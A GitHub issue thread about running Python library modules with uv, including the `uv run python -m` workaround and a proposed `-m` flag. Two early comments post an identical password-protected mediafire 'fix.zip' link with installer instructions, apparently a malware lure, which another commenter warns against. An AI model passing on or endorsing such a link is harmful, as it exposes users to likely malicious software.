### ISSUE TITLE
How to run a library module?

### ISSUE THREAD

**Issue by ollimandoliini** [astral-sh/uv#6638]
What is the recommended way for running a library module like I would do in vanilla python with the `-m` flag.

E.g.
```sh
python -m mylibrary.module
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Eutropios** [comment]
Please don't click the two links above. It's most likely a virus.

**Comment by gusutabopb** [comment]
I believe that'd be simply

```bash
uv run python -m mylibrary.module
```

**Comment by ollimandoliini** [comment]
Thanks! That's what I have been using.

It's a bit confusing because there is no parallel for `uv run file.py` for running a module.

**Comment by charliermarsh** [comment]
We could consider adding `-m module` but in the meantime yes, explicitly adding `python` there is expected (\cc @zanieb).

**Comment by zanieb** [comment]
I think we should document this. I'm not sure we should provide a shorthand yet... but it does seem kind of nice?

**Comment by johnhoran** [comment]
One downside to the `uv run python -m mylibrary.module` approach is that this doesn't allow for the inline script metadata.

**Comment by zanieb** [comment]
In that case, your module is defined in a script?

**Comment by zanieb** [comment]
Unless someone can think of another use for the `-m` flag I think it's fine to use for this and should be an easy first contribution.

cc @konstin

**Comment by rogerbinns** [comment]
Is the `-m` flag even necessary?  If a relevant binary isn't found by uv run, couldn't it automatically then behave as though -m was provided?  I'm most interested in `uvx` working, so my [earlier example](https://github.com/astral-sh/uv/issues/6638#issuecomment-2341245714) would just become `uvx apsw ...` or `uvx apsw.speedtest ...`.

**Comment by zanieb** [comment]
I don't think implicit behavior is great when executing things, for safety and security reasons.

Why not expose script entry points for your modules? https://docs.astral.sh/uv/concepts/projects/#defining-entry-points

**Comment by rogerbinns** [comment]
I agree with the safety aspect in principle, but in this specific case the user already has explicitly said they are trying to run the provided parameters.  Adding more hoops to jump through will just be annoying.

The problem with `project.scripts` is that it creates new executables that end up in `$PATH`, in completions, and in a global namespace.  My project is python specific and doesn't need to contribute to that pollution.

**Comment by zanieb** [comment]
> end up in $PATH, in completions, and in a global namespace

Fair, but note this isn't the case unless you install the project globally or activate the virtual environment — both of which are not necessary with `uv run`.

**Comment by zanieb** [comment]
I see. Maybe your use-case would be fulfilled by #5903 then. There's also an exploration of module support in https://github.com/astral-sh/uv/pull/7322 — but there was some complexity in the command line handling. Maybe the solution is a `--module` flag like we are adding for `--script` #7739?

**Comment by rogerbinns** [comment]
I don't have a preference on the solution implementation, as long as the interface is as friendly as `python -m module args...`, and I'm happy to put whatever uv specific config is needed in pyproject.toml to make that happen.

**Comment by zanieb** [comment]
Okay thanks for your feedback. @j178 do you see a problem with just doing `module: bool` instead of `module: Option<String>`?

**Comment by j178** [comment]
Seems working 😆  #7754

**Comment by neopostmodern** [comment]
I'm still lost on how to use this. I want to automatically install and execute a PyPi module.
Straightup `uvx` fails and if I understand the discussion above correctly, that's intentional:
```
❯ uvx pixels2svg "/home/neopostmodern/example.png"
   Built pixels2svg==0.2.2
Installed 6 packages in 199ms
The executable `pixels2svg` was not found.
warning: Package `pixels2svg` does not provide any executables.
```
Now I tried the suggested `-m` flag, but then I get:
```
❯ uv run -m pixels2svg "/home/neopostmodern/example.png"
/usr/bin/python3: No module named pixels2svg
```
(why does this refer to `/usr/bin`?)

Meanwhile `uvx -m` unfortunately isn't a thing:
```
❯ uvx -m pixels2svg "/home/neopostmodern/example.png"
error: unexpected argument '-m' found
```

**Comment by zhuoqun-chen** [comment]
> I'm still lost on how to use this. I want to automatically install and execute a PyPi module.我还是不太清楚如何使用。我想自动安装和执行一个 PyPi 模块。 Straightup `uvx` fails and if I understand the discussion above correctly, that's intentional:直接 `uvx` 失败，如果我正确理解上面的讨论，这是有意为之的：
> 
> ```
> ❯ uvx pixels2svg "/home/neopostmodern/example.png"
>    Built pixels2svg==0.2.2
> Installed 6 packages in 199ms
> The executable `pixels2svg` was not found.
> warning: Package `pixels2svg` does not provide any executables.
> ```
> 
> Now I tried the suggested `-m` flag, but then I get:现在我尝试了建议的 `-m` 标志，但随后出现：
> 
> ```
> ❯ uv run -m pixels2svg "/home/neopostmodern/example.png"
> /usr/bin/python3: No module named pixels2svg
> ```
> 
> (why does this refer to `/usr/bin`?)（为什么这里引用了 `/usr/bin` ？）
> 
> Meanwhile `uvx -m` unfortunately isn't a thing:同时 `uvx -m` 不幸不存在：
> 
> ```
> ❯ uvx -m pixels2svg "/home/neopostmodern/example.png"
> error: unexpected argument '-m' found
> ```

Hi @neopostmodern, does this works for you?

```
uvx --with pixels2svg python -m pixel2svg.pixel2svg "/home/neopostmodern/example.png"
```

**Comment by neopostmodern** [comment]
Sorry, completely forgot about this.
It somehow does not work, but I don't understand why...

Compare these outputs:
```
❯ uvx --with pixels2svg python -m pixel2svg.pixel2svg /tmp/pixels.png
/home/neopostmodern/.cache/uv/archive-v0/5iOuXwv5Rgb8dTyUG-1e0/bin/python: Error while finding module specification for 'pixel2svg.pixel2svg' (ModuleNotFoundError: No module named 'pixel2svg')

❯ uvx --with pixels2svg python -m pixel2svg /tmp/pixels.png
/home/neopostmodern/.cache/uv/archive-v0/5iOuXwv5Rgb8dTyUG-1e0/bin/python: No module named pixel2svg

❯ uvx --with pixels2svg python
Python 3.11.14 (main, Dec 17 2025, 21:07:37) [Clang 21.1.4 ] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pixels2svg
>>> 
```

The last one works, so the module is there – but I somehow can't execute it as a module?!
